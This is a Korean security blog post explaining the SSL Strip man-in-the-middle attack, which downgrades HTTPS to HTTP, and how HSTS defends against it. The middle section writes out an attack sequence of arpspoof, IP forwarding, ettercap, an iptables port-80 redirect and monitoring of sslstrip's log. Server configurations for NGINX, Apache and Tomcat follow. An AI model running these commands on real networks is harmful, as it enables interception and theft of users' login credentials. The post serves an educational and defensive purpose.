ํ‹ฐ์Šคํ† ๋ฆฌ ๋ทฐ

WEB

SSL Strip ์ทจ์•ฝ์ 

๐ŸŒง: 2020. 10. 21.
๊ฐœ์š”

2009๋…„ ๋ณด์•ˆ์—ฐ๊ตฌ์› ์ด์˜€๋˜ Moxie Marlinspike ๊ฐ€ ์ฒ˜์Œ์œผ๋กœ ๋ฐœํ‘œํ–ˆ๋˜ ๊ณต๊ฒฉ์ž…๋‹ˆ๋‹ค. HTTPS(HyperText Transfer Protocol over Secure Socket Layer) ๋ผ๋Š” ๊ณต๊ฐœํ‚ค ์•”ํ˜ธํ™” ์—ฐ๊ฒฐ์„ ์‚ฌ์šฉํ•˜๊ณ  ์žˆ๋Š” ์›น์‚ฌ์ดํŠธ๋ฅผ HTTP ํ†ต์‹ ์œผ๋กœ ๋‹ค์šด๊ทธ๋ ˆ์ด๋“œ ์‹œ์ผœ ๋ฒ„๋ฆฌ๋Š” ์ผ์ข…์˜ MITM(Man In The Middle attack) ๊ณต๊ฒฉ ์ž…๋‹ˆ๋‹ค.

 

์ด ์ทจ์•ฝ์ ์˜ ์žฌ๋ฏธ์žˆ๋Š”์ ์€ ๊ณต๊ฒฉ์„ ๋‹นํ•ด๋„ SSL ์ธ์ฆ์„œ ์˜ค๋ฅ˜์™€ ๊ด€๋ จํ•˜์—ฌ ๋”ฐ๋กœ ์‚ฌ์šฉ์ž ์ธก์— ๋”ฐ๋กœ ํ‘œ์‹œํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์—  SSL Strip ๊ณต๊ฒฉ์ด ๋ฐœ์ƒํ•˜๊ณ  ์žˆ๋‹ค๋Š” ๋‹จ์„œ๋ฅผ ์ฐพ์„ ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

 

์–ด๋–ป๊ฒŒ ๋ฐœ์ƒ๋˜๋Š”๊ฐ€

์ฒซ๋ฒˆ์งธ๋กœ ARP Spoofing์„ ํ†ตํ•ด ARP Table์„ ์ค‘๋…์‹œํ‚ค๊ฑฐ๋‚˜ ์‚ฌ์šฉ์ž๊ฐ€ ๊ณต๊ฒฉ์ž์˜ ๋ฌด์„  ๋„คํŠธ์›Œํฌ์— ๋“ค์–ด์˜ค๋„๋ก ์œ ์ธํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

 

์‚ฌ์šฉ์ž๊ฐ€ ์›น ์„œ๋ฒ„์™€ ์„ธ์…˜์„ ํ™•๋ฆฝ ์‹œ ์ฒซ ๋ฒˆ์งธ๋กœ TCP ํ†ต์‹ ์„ ํ•˜๊ณ  ๊ทธ ํ›„๋Š” TLS / SSL๋กœ ๋ฆฌ๋‹ค์ด๋ ‰์…˜ ๋ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ ๊ณต๊ฒฉ์ž๋Š” SSL์„ ๋ฒ—๊ฒจ ๋‹ค์šด๊ทธ๋ ˆ์ด๋“œ ์‹œํ‚ค๊ณ  ์˜ค๊ณ  ๊ฐ€๋Š” ๋ฐ์ดํ„ฐ ์ •๋ณด๋ฅผ ์‰ฝ๊ฒŒ ํ›”์ณ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

ํ‰์†Œ์ฒ˜๋Ÿผ ํ‹ฐ์Šคํ† ๋ฆฌ ํŽ˜์ด์ง€์— ์ ‘์†ํ•˜๋ฉด ์ƒ๋‹จ์— ๋ณด์ด๋Š” ์ž๋ฌผ์‡ ์ฒ˜๋Ÿผ ์•”ํ˜ธํ™” ํ†ต์‹ ์„ ํ•˜๊ณ ์žˆ๊ธฐ์— ๋กœ๊ทธ์ธ ์‹œ ๋ฏผ๊ฐ์ •๋ณด๊ฐ€ ํŒจํ‚ทํ๋ฆ„์†์—์„œ ๋…ธ์ถœ๋˜์ง€ ์•Š๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

 

๋™์ผํ•œ ๋„คํŠธ์›Œํฌ์— ์ž ์ž…ํ•ด์žˆ๋Š” ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž์˜ ๋กœ๊ทธ์ธ ์ •๋ณด๋ฅผ ํš๋“ํ•˜๊ธฐ ์œ„ํ•ด ARP ์ค‘๋…์„ ์‹œํ‚ค๊ณ  ๊ฐ•์ œ๋กœ ํ‰๋ฌธํ†ต์‹ ์ธ HTTP๋กœ ํ†ต์‹ ํ•˜๋„๋ก ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<!-- ARP Spoofing ์‹œ๋„ -->
      arpspoof -i ์ธํ„ฐํŽ˜์ด์Šค๋ช… -t ํƒ€๊ฒŸIP ๊ฒŒ์ดํŠธ์›จ์ดIP
      arpspoof -i ์ธํ„ฐํŽ˜์ด์Šค๋ช… -t ๊ฒŒ์ดํŠธ์›จ์ดIP ํƒ€๊ฒŸIP

<!-- IP Forwarding(ํฌ์›Œ๋”ฉ) ํ™œ์„ฑํ™”
      fragrouter -B1
      echo 1 > /proc/sys/net/ipv4/ip forward

<!-- ettercap ์‹คํ–‰ -->
      ettercap -i ์ธํ„ฐํŽ˜์ด์Šค๋ช… -T -q
      -T : Text ๋ชจ๋“œ
      -q : quite ๋ชจ๋“œ ์ฆ‰ ๋ถˆํ•„์š”ํ•œ๋‚ด์šฉ ์ถœ๋ ฅX

<!-- ๋ชฉ์ ์ง€ ํฌํŠธ๊ฐ€ 80๋ฒˆ์œผ๋กœ ๋“ค์–ด์˜ค๋Š” ๋ชจ๋“  ํŒจํ‚ท์„ 1000๋ฒˆ ํฌํŠธ๋กœ ๋ฆฌ๋‹ค์ด๋ ‰ํŠธ -->
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
      -t nat : nat ํ…Œ์ด๋ธ” ์‚ฌ์šฉ
      -A PREROUTING : nat ์™€ ์—ฐ๊ด€, ์ฒ˜์Œ์œผ๋กœ ์ „๋‹ฌ ๋ฐ›์€ ํŒจํ‚ท์„ ์ฒ˜๋ฆฌํ•˜๋Š” ํ•„ํ„ฐ๋ง ์ง€์ 
      -p tcp : tcp ํ”„๋กœํ† ์ฝœ ์ง€์ •(80๋ฒˆ ํฌํŠธ๋Š” ์‹ ๋ขฐ์„ฑ)
      --destination-port 80 : ๋ชฉ์ ์ง€ 80๋ฒˆํฌํŠธ
      -j REDIRECT : jump ์ฆ‰ ๋ฆฌ๋‹ค์ด๋ ‰์…˜
      --to-ports 1000 : SSL Strip ๊ณต๊ฒฉ์‹œ ๊ธฐ๋ณธ์ ์œผ๋กœ 1000๋ฒˆ ํฌํŠธ๋กœ ์ง€์ •๋˜์–ด ์žˆ์Œ

<!-- ๊ณต๊ฒฉ์ˆ˜ํ–‰ํ›„ ๋Œ€์ƒ ๋ชจ๋‹ˆํ„ฐ๋ง -->
      tail -f sslstrip.log

* ๋กœ๊ทธํŒŒ์ผ ๋น„์šฐ๊ธฐ : cat /dev/null > sslstrip.log

๊ณต๊ฒฉ์„ ๋‹นํ•œ ํ›„ ํ‰์†Œ๋Œ€๋กœ www.tistory.com์„ ์ž…๋ ฅํ•˜๊ณ  ์ ‘์†ํ•˜๋ฉด ์ฃผ์†Œ์ฐฝ์˜ URL ๋ถ€๋ถ„์— ์ž๋ฌผ์‡ ๊ฐ€ ํ’€๋ ค์žˆ๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ทธ ์™ธ์—๋Š” ์•„๋ฌด๋Ÿฐ ์œก์•ˆ์œผ๋กœ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” ์ด๋ฒคํŠธ๊ฐ€ ์—†๊ธฐ ๋•Œ๋ฌธ์— ์‰ฝ๊ฒŒ ๋ˆˆ์น˜์ฑŒ ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

 

์•„๋ฌด๊ฒƒ๋„ ๋ชจ๋ฅธ ์ฑ„ ๋กœ๊ทธ์ธ์„ ์‹œ๋„ํ•œ ์‚ฌ์šฉ์ž๋Š” ํ‰์†Œ์ฒ˜๋Ÿผ ์›น ์„œํ•‘์„ ์ฆ๊ธฐ๊ณ  ์žˆ๊ฒ ์ง€๋งŒ ๊ณต๊ฒฉ์ž๊ฐ€ ARP ์ค‘๋…์„ ์‹œํ‚ด์œผ๋กœ์จ ์ค‘๊ฐ„์— ๋ชจ๋“  ํŠธ๋ž˜ํ”ฝ์„ ํ‰๋ฌธ์œผ๋กœ ํ™•์ธํ•  ์ˆ˜๊ฐ€ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

 


์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•œ ์›์ธ

SSL Strip ์ด ์ƒ๊ธด ๊ธฐ์›์€ ์‚ฌ์šฉ์ž๋“ค์ด URL ๋˜๋Š” ๋ถ๋งˆํฌ ๋œ https:// ๋ฅผ ์ง์ ‘ ์ž…๋ ฅํ•˜์—ฌ SSL ์ด ์ ์šฉ๋œ ์›น ์‚ฌ์ดํŠธ๋ฅผ ์ ‘์†ํ•˜์ง€ ์•Š๊ณ  ๋‹จ์ˆœํžˆ tistory.com๊ณผ ๊ฐ™์ด ์ฃผ์†Œ๋งŒ ์ž…๋ ฅํ•˜์—ฌ ๋“ค์–ด๊ฐ„๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

 

์˜ฌ๋ฐ”๋ฅธ ๋Œ€์‘๋ฐฉ์•ˆ์€ ์•„๋‹ˆ์ง€๋งŒ ๊ณต๊ณต ๋„คํŠธ์›Œํฌ์—์„œ๋Š” ์ ‘์† ์‹œ ๋˜๋„๋ก https ๊ฐ€ ๋ถ™์€ ๋งํฌ๋ฅผ ํ†ตํ•ด ๋“ค์–ด๊ฐ€๊ฑฐ๋‚˜ ์ž…๋ ฅ์„ ํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. SSL Strip ๊ณต๊ฒฉ์„ ์ด๋ฏธ ๋‹นํ•˜๊ณ  ์žˆ๋‹ค ํ•˜๋”๋ผ๊ณ  https๋ฅผ ์ˆ˜๊ธฐ๋กœ ์ž…๋ ฅํ•ด ๋“ค์–ด๊ฐ„ ์‚ฌ์šฉ์ž์˜ ์ •๋ณด๋Š” ๊ฐˆ์ทจํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

 

๋˜ํ•œ http(๋ฉ”์ธ)์™€ https(๋กœ๊ทธ์ธ, ๊ฒฐ์ œ, ํšŒ์›๊ฐ€์ž… ๋“ฑ)๋ฅผ ๋ฒˆ๊ฐˆ์•„ ์“ฐ๋Š” ๊ณณ์ด ๋งŽ๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ฐฉ๋ฒ•์€ SSL Strip ๊ณต๊ฒฉ์— ๋…ธ์ถœ๋  ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค. 

* ํ˜„์žฌ ๋„ค์ด๋ฒ„, ๊ตฌ๊ธ€, ๋‹ค์Œ, ํŽ˜์ด์Šค๋ถ ๊ฐ™์€ ๊ธ€๋กœ๋ฒŒ ํŽ˜์ด์ง€์˜ ๊ฒฝ์šฐ ์ „ ๊ตฌ๊ฐ„ https ๋ฅผ ์‚ฌ์šฉ์ค‘

 

๋Œ€์‘ ๋ฐฉ์•ˆ

๋น„์šฉ๊ณผ ๋ชจ๋“  Byte์˜ ์ •๋ณด๋ฅผ ์‚ฌ์šฉ์ž์™€ ์„œ๋ฒ„๊ฐ€ ์•”ํ˜ธํ™” ๋ฐ ํ•ด๋…์„ ํ•ด์•ผ ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์†๋„๊ฐ€ ๋Š๋ ค์งˆ ์ˆ˜๋ฐ–์— ์—†๋Š” ๋‹จ์ ์ด ์กด์žฌํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์„œ๋น„์Šค์˜ ํ’ˆ์งˆ ์ชฝ์„ ๋” ์ค‘์š”์‹œ ์—ฌ๊ธฐ๊ณค ํ•ฉ๋‹ˆ๋‹ค.

 

์˜ฌ๋ฐ”๋ฅด๊ฒŒ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•ด์„  ์ „๊ตฌ๊ฐ„ https๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ข‹์ง€๋งŒ ์ด์™ธ์—๋„ ์„œ๋ฒ„์ธก ์—์„œ ์กฐ์น˜ํ•  ์ˆ˜ ์žˆ๋Š” HSTS(HTTP Stric Transport Security)๋ฅผ ์ ์šฉํ•˜๋Š”๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

 

HSTS๋Š” ํ•ด๋‹น ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•˜๋Š” ์‚ฌ์šฉ์ž๊ฐ€ https ๋กœ๋งŒ ์—ฐ๊ฒฐ๋˜๋„๋ก ๋ช…๋ นํ•˜๋Š” ํ˜•ํƒœ์ž…๋‹ˆ๋‹ค. ์ฃผ๋กœ ๋Œ€ํ˜• ํฌํ„ธ์‚ฌ์ดํŠธ์˜ ๊ฒฝ์šฐ HSTS ๊ฐ€ ์ ์šฉ๋˜์–ด์žˆ๋Š” ํŽธ์ด๋ฉฐ ์ด๋ฅผ ์ ์šฉํ•˜๋ฉด SSL Strip ๊ณต๊ฒฉ์„ ๋ฌด๋ ฅํ™” ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

// NGINX ์„ค์ •
// includeSubDomains๋งค๊ฐœ ๋ณ€์ˆ˜๋Š” HSTS ์ •์ฑ…์ด ํ˜„์žฌ ๋„๋ฉ”์ธ์˜ ๋ชจ๋“  ํ•˜์œ„ ๋„๋ฉ”์ธ์—๋„ ์ ์šฉ 
//  NGINX (๋ฒ„์ „ 1.7.5 ๋˜๋Š” NGINX Plus R5 ์ด์ „)๋Š” always๋งค๊ฐœ ๋ณ€์ˆ˜๋ฅผ ์ง€์› ํ•˜์ง€ ์•Š์Œ

server {
    listen 443 ssl;
    server_name www.example.com;

    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
       }
// Apache ์„ค์ •
// includeSubDomains ์ธ์ˆ˜๋ฅผ ์ถ”๊ฐ€ํ•˜๋ฉด ํ•˜์œ„ ๋„๋ฉ”์ธ์—๋„ ์—ฐ๊ฒฐ
//  63072000 ์ดˆ (2 ๋…„) 

/etc/apache2/sites-enabled/

<VirtualHost *:443>
...
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
...
</VirtualHost>
// Apache Tomcat(8.x) ์„ค์ •
// web.xml ํŒŒ์ผ์„ ํŽธ์ง‘, httpHeaderSecurity ํ•„ํ„ฐ ์ •์˜ ๋ฐ <filter-mapping> ์„น์…˜์˜ ์ฃผ์„ ์ฒ˜๋ฆฌ๋ฅผ
์ œ๊ฑฐํ•˜๊ณ  ์•„๋ž˜์™€ ๊ฐ™์ด hstsMaxAgeSeconds ๋งค๊ฐœ ๋ณ€์ˆ˜๋ฅผ ์ถ”๊ฐ€

<filter>
 <filter-name>httpHeaderSecurity</filter-name>
 <filter-class>org.apache.catalina.filters.HttpHeaderSecurityFilter</filter-class>
 <init-param>
  <param-name>hstsEnabled</param-name>
  <param-value>true</param-value>
 </init-param> 
 <init-param>
  <param-name>maxAgeSeconds</param-name>
  <param-value>31536000</param-value>
 </init-param>
 <init-param>
  <param-name>includeSubDomains</param-name>
  <param-value>true</param-value>
 </init-param>
 <async-supported>true</async-supported>
</filter>

<filter-mapping>
<filter-name>httpHeaderSecurity</filter-name>
<url-pattern>/*</url-pattern>
<url-pattern>*</url-pattern>
<dispatcher>REQUEST</dispatcher>
</filter-mapping>
๊ณต์œ ํ•˜๊ธฐ ๋งํฌ
Comment